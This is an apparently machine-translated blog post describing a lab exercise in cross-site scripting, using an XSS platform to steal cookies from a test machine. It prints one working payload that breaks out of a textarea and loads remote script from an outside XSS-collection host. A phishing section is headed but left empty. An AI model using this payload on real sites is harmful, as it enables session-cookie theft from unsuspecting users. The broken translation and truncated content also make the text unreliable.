Study concluded XSS this time

0X01 advantage of the platform payload obtain COOKIE

Native IP 192.168.1.100

Drone win7 192.168.1.102

Let's create a cookie project

Then we insert malicious code can be executed in place of xss

</tExtArEa>'"><sCRiPt sRC=https://xsshs.cn/JBYE></sCrIpT>

You can see the success of Echo

0X02 basis for certification Fishing

 

Guess you like

Origin www.cnblogs.com/-zhong/p/10986399.html